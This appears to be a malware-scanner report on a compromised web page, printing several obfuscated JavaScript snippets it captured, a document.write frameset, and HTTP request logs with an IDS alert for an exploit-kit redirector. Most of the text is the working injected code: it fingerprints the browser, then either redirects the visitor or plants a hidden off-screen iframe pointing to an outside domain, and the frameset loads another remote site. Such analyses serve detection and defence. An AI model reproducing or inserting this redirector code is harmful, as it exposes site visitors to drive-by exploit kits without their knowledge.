                        cbHRxdMBejiosgNbnFdqqbvhXYruVQdLnknKJvAx[hKiCbVqFkFocjwkxpBxrMNgzpsBaEXjsDEAoUO].innerHTML = cbHRxdMBejiosgNbnFdqqbvhXYruVQdLnknKJvAx[hKiCbVqFkFocjwkxpBxrMNgzpsBaEXjsDEAoUO].innerHTML + YIVbAkWhXjHsgpJLJtwKbqbxslneeEVXc
                    }
                }
            }
        }
        xHadRuQQaeuHOyErqeupJnLpirvnoDVsgkDo()
    }
}, 100);

function xHadRuQQaeuHOyErqeupJnLpirvnoDVsgkDo() {
    var OqruwoxlZbJmzcvZIUVdCcOXPNYtqLcazWmoXGwW = "none";
    if (OqruwoxlZbJmzcvZIUVdCcOXPNYtqLcazWmoXGwW != "none") {
        var wDExITQZpYPgfkXTiNoPkXIhOXIszlh = document.getElementById(OqruwoxlZbJmzcvZIUVdCcOXPNYtqLcazWmoXGwW);
        if (typeof wDExITQZpYPgfkXTiNoPkXIhOXIszlh != undefined && wDExITQZpYPgfkXTiNoPkXIhOXIszlh != null) {
            wDExITQZpYPgfkXTiNoPkXIhOXIszlh.outerHTML = "";
            delete wDExITQZpYPgfkXTiNoPkXIhOXIszlh
        }
    }
};

function fIWfEqmxuupijIgAVKULyCvosSNYtYTXj() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && LSprLIsCGdqhuIRYyzJXlAipUaDyuEHnAZXPmb()) {
        return true
    } else {
        return false
    }
}

function LSprLIsCGdqhuIRYyzJXlAipUaDyuEHnAZXPmb() {
    var SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn = window.navigator.userAgent;
    var owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("MSIE ");
    if (owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO > 0) {
        return parseInt(SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.substring(owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO + 5, SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf(".", owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO)), 10)
    }
    var fxKxgyPEPmfGQyQCPnlbSAFebppKBHITLuSyzxYgm = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("Trident/");
    if (fxKxgyPEPmfGQyQCPnlbSAFebppKBHITLuSyzxYgm > 0) {
        var echCwIsOasOKxccOZevMXJUnUTVRUdtVcp = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("rv:");
        return parseInt(SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.substring(echCwIsOasOKxccOZevMXJUnUTVRUdtVcp + 3, SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf(".", echCwIsOasOKxccOZevMXJUnUTVRUdtVcp)), 10)
    }
    var HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("Edge/");
    if (HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz > 0) {
        return parseInt(SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.substring(HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz + 5, SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf(".", HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz)), 10)
    }
    return false
}

function LvULxPxBVGMNEHpyOpFcGdQwYTNwIJsV() {
    var PKxNNdgCJRDRgxZEWaQkmvAmVIZFVsP = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(PKxNNdgCJRDRgxZEWaQkmvAmVIZFVsP) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(PKxNNdgCJRDRgxZEWaQkmvAmVIZFVsP.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#7 JavaScript::Eval (size: 6247, repeated: 1) - SHA256: 661bc9a33bd1fb4d7c0cc2f0ddcdaea68911a5e3a0080599becac7bf631f845f

                                        var elLiWDCYRRWCkIjpgVDhhBXoQhGcDERtdXfHNyK = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(elLiWDCYRRWCkIjpgVDhhBXoQhGcDERtdXfHNyK);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var aFWtDvEFIEInuLoLDzJnCeGAKKbmxpEWQDXN = (sqIDAdAwkhGJJkcYWCPvOoAfKkTlxlbWeBlC() && prdRoEfNrGDbCcIMVbhsmaQsiZvIjkCJ());
            var PwCVTiftpOaGEJHBvJvYKBywNSfFxgbMsWUR = !aFWtDvEFIEInuLoLDzJnCeGAKKbmxpEWQDXN && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var rxLuhcCtSKoSuiZlgWmTNzDxwhutepjnTHScq = -1;
            var RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd = "http://trahnytbushakiry.ga";
            if (xOMySnhCwZEzHGrXwDnFapmIhVsYDwPd() && rxLuhcCtSKoSuiZlgWmTNzDxwhutepjnTHScq == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd)
                } else {
                    window.location = RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd;
                    document.location = RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd
                }
            } else {
                if ((aFWtDvEFIEInuLoLDzJnCeGAKKbmxpEWQDXN && !PwCVTiftpOaGEJHBvJvYKBywNSfFxgbMsWUR && !xOMySnhCwZEzHGrXwDnFapmIhVsYDwPd())) {
                    var GGqaDVLblSjzYvDOmYnijjaNjDyxxwhvPcbzhS = "<div style=\"position:absolute;left:-2566px;\"><iframe width=\"19px\" src=\"" + RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd + "\" height=\"19px\"></iframe></div>";
                    var GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL = document.getElementsByTagName("div");
                    if (GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + GGqaDVLblSjzYvDOmYnijjaNjDyxxwhvPcbzhS
                    } else {
                        var dl_name = GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL.length;
                        var QDukCqzbFQQgMOmKgEcTneBfOXNbvXFLza = Math.floor((dl_name / 2));
                        GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL[QDukCqzbFQQgMOmKgEcTneBfOXNbvXFLza].innerHTML = GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL[QDukCqzbFQQgMOmKgEcTneBfOXNbvXFLza].innerHTML + GGqaDVLblSjzYvDOmYnijjaNjDyxxwhvPcbzhS
                    }
                }
            }
        }
        jOYRAGqvhMRWrYlHjHxNpKABEgySjQFOCPOqIO()
    }
}, 100);

function jOYRAGqvhMRWrYlHjHxNpKABEgySjQFOCPOqIO() {
    var qFDYKZbIajGeZiFlGEdQCMHZbreCNkof = "none";
    if (qFDYKZbIajGeZiFlGEdQCMHZbreCNkof != "none") {
        var ImUmydOrVKRPWjJkzpObJleKWAEZKtC = document.getElementById(qFDYKZbIajGeZiFlGEdQCMHZbreCNkof);
        if (typeof ImUmydOrVKRPWjJkzpObJleKWAEZKtC != undefined && ImUmydOrVKRPWjJkzpObJleKWAEZKtC != null) {
            ImUmydOrVKRPWjJkzpObJleKWAEZKtC.outerHTML = "";
            delete ImUmydOrVKRPWjJkzpObJleKWAEZKtC
        }
    }
};

function prdRoEfNrGDbCcIMVbhsmaQsiZvIjkCJ() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && sqIDAdAwkhGJJkcYWCPvOoAfKkTlxlbWeBlC()) {
        return true
    } else {
        return false
    }
}

function sqIDAdAwkhGJJkcYWCPvOoAfKkTlxlbWeBlC() {
    var lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj = window.navigator.userAgent;
    var EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("MSIE ");
    if (EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ > 0) {
        return parseInt(lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.substring(EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ + 5, lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf(".", EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ)), 10)
    }
    var WPnJtCfgHjWpyzwcafHUftdLsUcQmsAxAKYRPnCx = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("Trident/");
    if (WPnJtCfgHjWpyzwcafHUftdLsUcQmsAxAKYRPnCx > 0) {
        var grBHPptZdaWCkexahntNOtjUSErwhMeIFWarVG = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("rv:");
        return parseInt(lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.substring(grBHPptZdaWCkexahntNOtjUSErwhMeIFWarVG + 3, lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf(".", grBHPptZdaWCkexahntNOtjUSErwhMeIFWarVG)), 10)
    }
    var GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("Edge/");
    if (GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW > 0) {
        return parseInt(lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.substring(GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW + 5, lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf(".", GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW)), 10)
    }
    return false
}

function xOMySnhCwZEzHGrXwDnFapmIhVsYDwPd() {
    var JtybplloeNxwQpzClpOORxjWvsvwOFGRu = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(JtybplloeNxwQpzClpOORxjWvsvwOFGRu) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(JtybplloeNxwQpzClpOORxjWvsvwOFGRu.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#8 JavaScript::Eval (size: 6315, repeated: 1) - SHA256: c3bc3fab850d3318a928eb4794e717f328596de263e2f2cc7e6cc9c253e907e5

                                        var mgHhQYahdFelqeqOwnGpKYteGNnCIUjYOFzAcROel = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(mgHhQYahdFelqeqOwnGpKYteGNnCIUjYOFzAcROel);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var sgkzBydgeJesFKtuFylpmYJMWyppNirwnlEIVBfvf = (qLdydXehYIEMyPdfTmkyxuegkfKrrqYeHQadN() && GoOivhIfOYylwWesOJnLktMdrCXPWifLHpxGWFRo());
            var rLbpfSEJofuwDgSBbyPADedtpWJHZnKMdHYBrWr = !sgkzBydgeJesFKtuFylpmYJMWyppNirwnlEIVBfvf && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var EWpysYcYJIgXPmCefUkiCRChuxsCrKYPRr = -1;
            var wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ = "http://trahnytbushakiry.ga";
            if (CinwPHDgadHBjYdkxRmrSwryNfmTQjfDLt() && EWpysYcYJIgXPmCefUkiCRChuxsCrKYPRr == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ)
                } else {
                    window.location = wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ;
                    document.location = wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ
                }
            } else {
                if ((sgkzBydgeJesFKtuFylpmYJMWyppNirwnlEIVBfvf && !rLbpfSEJofuwDgSBbyPADedtpWJHZnKMdHYBrWr && !CinwPHDgadHBjYdkxRmrSwryNfmTQjfDLt())) {
                    var GYeUByPlQzaCQOkguIbWYQiKWLDqUHbA = "<div style=\"position:absolute;left:-1945px;\"><iframe width=\"22px\" src=\"" + wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ + "\" height=\"22px\"></iframe></div>";
                    var ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm = document.getElementsByTagName("div");
                    if (ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + GYeUByPlQzaCQOkguIbWYQiKWLDqUHbA
                    } else {
                        var dl_name = ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm.length;
                        var fNspoafbhGysFpGLEsBFxZizblLPrJjjiAmrao = Math.floor((dl_name / 2));
                        ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm[fNspoafbhGysFpGLEsBFxZizblLPrJjjiAmrao].innerHTML = ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm[fNspoafbhGysFpGLEsBFxZizblLPrJjjiAmrao].innerHTML + GYeUByPlQzaCQOkguIbWYQiKWLDqUHbA
                    }
                }
            }
        }
        zHsmGupjMOGUpggHxSHnVWLnmJFUSTqb()
    }
}, 100);

function zHsmGupjMOGUpggHxSHnVWLnmJFUSTqb() {
    var eejMQMimaScIDPHZMMIDRUrViXmUrmBHqxcAp = "none";
    if (eejMQMimaScIDPHZMMIDRUrViXmUrmBHqxcAp != "none") {
        var tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx = document.getElementById(eejMQMimaScIDPHZMMIDRUrViXmUrmBHqxcAp);
        if (typeof tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx != undefined && tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx != null) {
            tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx.outerHTML = "";
            delete tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx
        }
    }
};

function GoOivhIfOYylwWesOJnLktMdrCXPWifLHpxGWFRo() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && qLdydXehYIEMyPdfTmkyxuegkfKrrqYeHQadN()) {
        return true
    } else {
        return false
    }
}

function qLdydXehYIEMyPdfTmkyxuegkfKrrqYeHQadN() {
    var yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI = window.navigator.userAgent;
    var nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("MSIE ");
    if (nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu > 0) {
        return parseInt(yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.substring(nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu + 5, yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf(".", nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu)), 10)
    }
    var NEAnxxxQmSwdEAOFUyRrdwQkBvrlTIPZJEcjkDrG = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("Trident/");
    if (NEAnxxxQmSwdEAOFUyRrdwQkBvrlTIPZJEcjkDrG > 0) {
        var rHZUuaEXnkuVyGdSHHlRgvkFHaTVtnQWeXhAZLnz = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("rv:");
        return parseInt(yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.substring(rHZUuaEXnkuVyGdSHHlRgvkFHaTVtnQWeXhAZLnz + 3, yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf(".", rHZUuaEXnkuVyGdSHHlRgvkFHaTVtnQWeXhAZLnz)), 10)
    }
    var sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("Edge/");
    if (sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP > 0) {
        return parseInt(yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.substring(sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP + 5, yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf(".", sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP)), 10)
    }
    return false
}

function CinwPHDgadHBjYdkxRmrSwryNfmTQjfDLt() {
    var YovozoGrLqLkJcIUouCkAcZOBvQeJYA = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(YovozoGrLqLkJcIUouCkAcZOBvQeJYA) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(YovozoGrLqLkJcIUouCkAcZOBvQeJYA.substr(0, 4))) {
        return true
    }
    return false
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 195, repeated: 1) - SHA256: 50a1c440ed7af6c67ed4c47843fad0e3bef22eab8f1b273d5d4f2cb88c6018d2

                                        < frameset rows = "*,0"
framespacing = "0"
border = "0"
frameborder = "NO" > < frame src = "http://grenosi.ru/3d33?charset=utf-8&keyword=honeysuckle hill pumpkin patch"
noresize = ""
scrolling = "auto" > < /frameset>
                                    


HTTP Transactions (52)


Request Response
                                        
                                            GET /homim/zekifohe.html HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8911
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8911
Md5:    dae4e540a53b057a9f06d17607cf44c0
Sha1:   d651b3c0d1f54f1e3fe4e448f59da8421b24ddb1
Sha256: 159921e77cf7292196a4cf93f836b564bf1bb865fe1b8eb56026fcb4caa91dec

Alerts:
  IDS:
    - ET CURRENT_EVENTS Possible Evil Redirector Leading to EK June 10 2015
                                        
                                            GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1 
Host: netdna.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         209.197.3.15
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Etag: "1518903977"
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 5376
Last-Modified: Sat, 17 Feb 2018 21:46:17 GMT
